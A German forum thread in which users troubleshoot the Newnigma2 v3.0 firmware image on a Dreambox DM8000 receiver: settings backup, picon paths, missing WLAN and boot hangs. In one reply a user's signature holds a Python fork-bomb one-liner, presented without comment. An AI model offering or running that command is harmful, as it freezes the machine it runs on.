DM8000: Newnigma2 v3.0

• wie schon einige Vorredner schon erwähnt haben "Super Job", klappt Klasse.

1.) USB stick an die Box mit dem alten 2.8.4 Image
      2.) Alle Einstellungen auf USB gespeichert (Warnungen Ignoriert nicht vorhanderner Configfiles)
      3.) 3.0 Image uebers Webinterface ins ROM geflasht.
      4.) Configfiles wieder restored.

Alles da, Bouque und Senderlisten, Netzwekkonfig, CCam etc. und neuestes Image.

Das einzige was mich gewundert hat und vieleicht sollten einige nicht so ungeduldig sein, das Booten nach dem Flashen hat ungewöhnlich lange gedauert. Auch das neustarten der Box nach dem Config restore dauerte sehr lange. Aus einigen Posts hies es ja, dass besonders das booten schnell von statten gehen soll. Kann das jemand bestätigen ?

gruss benjo

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von benjo ()

• Original von kati910
      Original von terra7
      Hi,
      vielen Dank für das Image .

Meine Skin Picons von USB funzen nicht mehr , LCD Picons gehen.
      Wer weiß Rat ?

USB-Stick:
      Diese werden nach dem Anschluss an die Dreambox als SDA1 erkannt (sofern nur ein USB-Stick sich an der Dreambox befindet). Nach einem Neustart ist der Stick nun auf /media/hdd zu finden

Bei mir ist es immer noch :autofs/33b7b47e-d918-442b-90c6-b65c1bdf3fb4/

mfg

Das iss aber auch schwer 3 knöppe zu drücken.

Was bist Du denn für einer ? Bist wohl mit Dream und Newnigma2 aufgewachsen ?
      Statt dumme Sprüche , kannst Du ja mal Dein wissen weiter geben
      terra7

Dream 920

Draem One

Dream 7080

:prost:
    • Original von terra7

Du must die Einstellungen (Pfad) unter Expertenmenü neu vornehmen.
    • Original von terra7
      Original von kati910
      Original von terra7
      Hi,
      vielen Dank für das Image .

Meine Skin Picons von USB funzen nicht mehr , LCD Picons gehen.
      Wer weiß Rat ?

USB-Stick:
      Diese werden nach dem Anschluss an die Dreambox als SDA1 erkannt (sofern nur ein USB-Stick sich an der Dreambox befindet). Nach einem Neustart ist der Stick nun auf /media/hdd zu finden

Bei mir ist es immer noch :autofs/33b7b47e-d918-442b-90c6-b65c1bdf3fb4/

mfg

Das iss aber auch schwer 3 knöppe zu drücken.

Ich bin einer der jenigen der das zeug schreibt und ja ich weiss wovon ich rede :P :P
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von benjo
      Original von terra7

Du must die Einstellungen (Pfad) unter Expertenmenü neu vornehmen.

Danke
      komisch ist nur das die LCD Picons auch so gehen.
      Mit der Fernbedienung den Pfad eingeben ist ein Krampf

mfg
      terra7

Dream 920

Draem One

Dream 7080

:prost:
    • Original von benjo
      wie schon einige Vorredner schon erwähnt haben "Super Job", klappt Klasse.

1.) USB stick an die Box mit dem alten 2.8.4 Image
      2.) Alle Einstellungen auf USB gespeichert (Warnungen Ignoriert nicht vorhanderner Configfiles)
      3.) 3.0 Image uebers Webinterface ins ROM geflasht.
      4.) Configfiles wieder restored.

Alles da, Bouque und Senderlisten, Netzwekkonfig, CCam etc. und neuestes Image.

Das einzige was mich gewundert hat und vieleicht sollten einige nicht so ungeduldig sein, das Booten nach dem Flashen hat ungewöhnlich lange gedauert. Auch das neustarten der Box nach dem Config restore dauerte sehr lange. Aus einigen Posts hies es ja, dass besonders das booten schnell von statten gehen soll. Kann das jemand bestätigen ?

gruss benjo

Hi benjo,

mit welchem plugin/tool/auf welche weise hast du denn ein backup/configsave gemacht?
      habe nach dem flash des neuen image das DCC backup restored.senderlisten waren wieder,alles andere wie netzwerkeinstellungen etc musste ich selbst wieder vornehmen.

DANKE FÜRS IMAGE!ihr seid klasse
    • Originally posted by TechOne
      mit welchem plugin/tool/auf welche weise hast du denn ein backup/configsave gemacht?

Blaue Taste --> Enigma2 Menue --> SystemTools (oder ähnlich klingelnd) --> Backup/Restore und dort einfach ausgeführt. Ich denke es ist ein Plugin. Ich habe es aber nicht extra installieren müssen.

Originally posted by TechOne
      habe nach dem flash des neuen image das DCC backup restored.senderlisten waren wieder,alles andere wie netzwerkeinstellungen etc musste ich selbst wieder vornehmen.
      DANKE FÜRS IMAGE!ihr seid klasse

Hm, ich benutze kein DCC, daher keine Ahung was DCC da abspeichert. Ich habe denn ConfigSaver genutzt und mir angeschaut was abgespeichert wird. Es sah ziemlich plausieble aus daher hab ich einfach mal geflasht.
    • Originally posted by caliber
      habe bei mir kein Wlan.wer kann mir helfen
      mein normales lan zeigt er mir an brauche aber wlan.
      danke schonmal im voraus

Sei mir nicht böse aber meine :glaskugel1: ist kaputt, daher die Bitte um mehr Infos.

sonst mal hier reinschauen: wlan usb Stick installieren

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von benjo ()

• wenn ich bei netzwerk einstellungen bin hat er nur noch lan verbindung und wlan ist nicht bei den einstellungen zu finden
      bei 2.8.3 und 2.8.4 ist mein internes wlan da nur bei 3.0 nicht

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von caliber ()

• danke benjo!

Original von caliber
      wenn ich bei netzwerk einstellungen bin hat er nur noch lan verbindung und wlan ist nicht bei den einstellungen zu finden

kann ich nicht bestätigen.also die WLAN option sollte zumindest mal da sein.
      bei mir hatte ich nach der konfiguration des netzwerk auch erstmal keine WLAN Verbindung.erst nach einigen minuten war die verbindung da. (nachdem ich im router WLAN menü eine neue unbekannte MAC Adresse gesehen hab und die akzeptiert hab(?))
    • das problem ist nicht die verbindung ansich sondern das ich die waln funktion garnicht habe kann nichts aktivieren und einstellen
      habe auch schon neu installiert das gleiche problem

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von caliber ()

• Hallo zusammen,

ich möchte mich auch in die Reihe derer einreihen, die Bootprobleme mit dem 3.0er image haben.
      Ich habe eine Box aus der Betaserie (Production date: 20080929) mit der damals verbauten Festplatte und DVD-Brenner.
      Alle USB-Devices sind abgesteckt, keine Karten sind drin, komme beim Booten bis "starting" und komme per telnet auf die box
      enigma ist nicht gestartet, wenn ich das mache, kommt folgende fehlermeldung:

root@dm8000:~# enigma2::TPM challenge failed
      -sh: enigma2::TPM: not found

in /var/log/messages steht folgendes:
      May 18 17:18:56 dm8000 user.warn kernel: VIDEO0: set blank to 0
      May 18 17:18:56 dm8000 user.warn kernel: sync is off so we enable it
      May 18 17:18:56 dm8000 user.warn kernel: playback!
      May 18 17:18:56 dm8000 user.warn kernel: total video delay: 0 (0 ms)
      May 18 17:18:56 dm8000 user.warn kernel: VIDEO0: start decode
      May 18 17:18:56 dm8000 user.warn kernel: flush video decoder
      May 18 17:18:56 dm8000 user.warn kernel: VIDEO0: first pts 0x0
      May 18 17:18:56 dm8000 user.warn kernel: VIDEO0: stop decode
      May 18 17:18:56 dm8000 user.warn kernel: no decoder left in sync handling so disable xpt_sync
      May 18 17:18:57 dm8000 daemon.info init: Id "e2" respawning too fast: disabled for 5 minutes

ich weiss nicht, obs hilft, aber ...

hat das Problem schon jemand in den Griff bekommen???

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von infopicard ()

• Original von Traumkiste8000
      Überprüft mal eure kernel command line im Bios, wenn die Box nicht hochfährt. Nach dem Update stand da bei mir Mist drin. Dann einfach disablen oder korrigieren.

Jetzt läuft alles bei mir wieder, außer dem crossepg:(

Danke für den Tip. Leider hat er nix geholfen.

Bisher stand drinnen:
      console=ttyS0,115200 ip=10.0.120.203 nfsroot=1

ich habe reingeschrieben:
      console=ttyS0,115200 root=/dev/mtdblock3 rootfstype=jffs2 rw

Das Verhalten ist das Gleiche. Ich kann die 8000er genau ein mal nach dem Flashen benutzen, sobald ich das Skin ändere und die Box rebootet hängt sie bei 7/8 "starting..."

Hat hier niemand eine Ahnung? Es sind doch ziemlich viele mit Bootproblemen hier.

Danke und Viele Grüße
      yopi
    • Original von yopi
      Original von Traumkiste8000
      Überprüft mal eure kernel command line im Bios, wenn die Box nicht hochfährt. Nach dem Update stand da bei mir Mist drin. Dann einfach disablen oder korrigieren.

Jetzt läuft alles bei mir wieder, außer dem crossepg:(

Danke für den Tip. Leider hat er nix geholfen.

Bisher stand drinnen:
      console=ttyS0,115200 ip=10.0.120.203 nfsroot=1

ich habe reingeschrieben:
      console=ttyS0,115200 root=/dev/mtdblock3 rootfstype=jffs2 rw

Das Verhalten ist das Gleiche. Ich kann die 8000er genau ein mal nach dem Flashen benutzen, sobald ich das Skin ändere und die Box rebootet hängt sie bei 7/8 "starting..."

Hat hier niemand eine Ahnung? Es sind doch ziemlich viele mit Bootproblemen hier.

Danke und Viele Grüße
      yopi

ohne bootlog sorry die :glaskugel2: ist defekt
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.